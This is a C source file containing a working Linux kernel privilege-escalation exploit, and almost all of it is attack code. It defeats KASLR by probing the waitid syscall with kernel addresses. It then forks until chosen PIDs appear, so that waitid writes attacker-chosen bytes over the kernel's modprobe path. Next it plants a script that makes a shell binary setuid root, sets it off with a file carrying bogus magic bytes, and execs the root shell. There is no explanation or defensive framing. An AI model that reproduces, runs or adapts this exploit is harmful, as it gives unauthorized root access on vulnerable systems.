#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <errno.h>

uint64_t kbase;

uint64_t find_kbase()
{
	uint64_t kbase = 0xffffffff81000000;
	int rc;

	while (1) {
		rc = syscall(SYS_waitid, P_ALL, 0, kbase, WEXITED, NULL);
		if (errno != EFAULT)
			return kbase - 0xe00000;

		kbase += 0x100000;
	}
}


void fork_until_pid(int target_pid)
{
	int pid;

	while (1) {
		pid = fork();
		if (pid == 0)
			exit(0);

		if (pid == target_pid)
			return;
		else
			waitpid(pid, NULL, 0);
	}
}


/*
typedef struct siginfo {
	int si_signo;    - 0
	int si_errno;    - 4
	int si_code;     - 8
	int _pad;        - 12

	int pid;         - 16
	int uid;         - 20
	int status;      - 24
}
*/

int main()
{
	uint64_t sbin_modprobe;

	/* break kaslr */
	kbase = find_kbase();
	printf("kbase = %#lx\n", kbase);

	sbin_modprobe = kbase + 0xe40280;

	/* "tm" */
	fork_until_pid(0x6d74);
	syscall(SYS_waitid, P_ALL, 0, sbin_modprobe - 16, WEXITED, NULL);
	printf("wrote: tm\n");

	/* "p/" */
	fork_until_pid(0x2f70);
	syscall(SYS_waitid, P_ALL, 0, sbin_modprobe - 16 + 2, WEXITED, NULL);
	printf("wrote: p/\n");

	/* "AA" */
	fork_until_pid(0x4141);
	syscall(SYS_waitid, P_ALL, 0, sbin_modprobe - 16 + 4, WEXITED, NULL);
	printf("wrote: AA\n");

	system("echo \""
	       "#!/bin/sh\n"
	       "chown root:root /home/user/gimme_shell\n"
	       "chmod ug+s /home/user/gimme_shell\n\" > /tmp/AA");
	system("chmod +x /tmp/AA");

	system("echo -en \"\\xff\\xff\\xff\\xff\" > /home/user/file");
	system("chmod +x /home/user/file");
	system("/home/user/file");

	execl("/home/user/gimme_shell", "gimme_shell", NULL);

	return 0;
}
